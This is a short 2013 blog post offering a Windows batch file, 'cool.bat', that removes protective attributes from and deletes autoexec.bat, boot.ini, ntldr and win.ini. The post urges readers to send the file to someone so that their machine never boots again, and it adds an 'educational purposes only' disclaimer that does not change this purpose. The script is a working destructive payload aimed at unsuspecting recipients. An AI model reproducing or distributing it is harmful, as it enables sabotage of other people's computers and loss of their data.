Tuesday 28 May 2013

Shutdown a window forever !!!

Warning Use it at ur own risk em nt responsible

Shutdown a window forever !!!

copy the code in notepad and save it as cool.bat

@echo off
attrib -r -s -h c:\autoexec.bat­
del c:\autoexec.bat­
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Send it to someone and his window will not boot again !!!

NOTE - this tutorial is for educational purposes only,
nd don't try open this file on ur PC

No comments:

Post a Comment